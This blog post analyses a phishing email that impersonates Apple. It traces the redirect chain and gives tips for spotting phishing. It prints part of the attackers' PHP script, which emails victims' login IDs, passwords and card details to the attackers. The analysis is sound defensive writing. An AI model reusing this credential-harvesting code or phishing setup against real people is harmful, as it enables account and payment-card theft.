Inside a phishing attack

25 September 2014

I was phished again some days ago. This time I received a well made phishing mail with a request for verifying my Apple account details:

Phishing Mail Browser View

Phishing Mail Browser View

This was a targeted attack because the email was directly sent to my Hotmail account. When viewed on the iPad the email looks like an official email from Apple.

But viewed in Outlook the senders address

Apple . <apple__itunes@outlook.com>

made it clear: This was a phishing attack. Apple would never send such a mail from an outlook.com account.

Fortunately, the attackers provided a copy of the phishing scripts for download from their web service. This offered me the wonderful opportunity to analyze a phishing attempt in detail.

All links in the email point to the same internet address, a server in France, that was compromised by the attackers to cover their tracks. They installed a small script ‘apple.php’ which was used for forwarding to the malicious site. The malicious site is hosted by a provider in Vancouver, Canada.

Phishing Site Login Form

Phishing Site Login Form

This is a really well crafted site in Apple style. But two errors in the address line

[1] http://[2]app-secure-restore.lideresrd.com/APP/ACCOU/RESET/

immediately catch the eye:

[1] Apple would never use the unsecure http protocol for access to site where users have to input their credentials. Standard for those applications is the https protocol.

In my opinion the protocol is the best indicator for identifying a phishing attempt.

As a rule of thumb, the usage of protocol http for user authentication means: You are under attack!

[2] Apple would never use a web service outside the Apple company web for user data verification.

Since we have identified this site as a malicious site, we enter some rubbish and press Continue for the next page. When pressing Continue the html command

<form method="post" action="RESTORE/">

is executed and sub page RESTORE at
http://app-secure-restore.lideresrd.com/APP/ACCOU/RESET/RESTORE/&#8217; is displayed:

Account Verifiacation Details

Account Verifiacation Details

Page RESTORE is created at runtime by a php script. If you press Verify my Information the script is executed again. This time it emails [1]  the data you entered to the attackers and runs script finish.php [2] that forwards you to the Apple store.

<!--?php
 $from_name  = '&iacute;Τunes';
 $from_email  = 'localhost';
 $to_email  = '<Attackers email addresses>';
 $subject  = 'New UK &iacute;Τunes  | '.$_POST['A13'].' ';
[2] $url_redirect = 'finish.php';
 if(isset($_POST) AND !empty($_POST) AND isset($_POST['A9'])){
   require_once("mail.class.php");
   $mail = new mail();
   $mail->emailto  = $to_email;
   $mail->namefrom  = $from_name;
   $mail->emailfrom = $from_email;
   $mail->subject  = $subject;
   $mail->message  = '';   
   $mail->message  .= 'CoT : '.$_POST['A5'].'
'; // payys
   $mail->message  .= 'I : '.$_POST['donnee1'].'
'; //Id
   $mail->message  .= 'P : '.$_POST['donnee2'].'
'; //Pass
  .... more code
   $mail->message  .= 'DRL  : '.$_POST['A13'].'
'; // Sortt
   $mail->message  .= 'CP : '.$_POST['A14'].'
'; // Carpas
   $mail->check  = $_POST['is_valid_email'];
[1]   $mail->send();
   header('location:'.$url_redirect);
 }
 else{
?>

That was a really long journey from Germany via France and Canada to Cupertino.

Take care!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s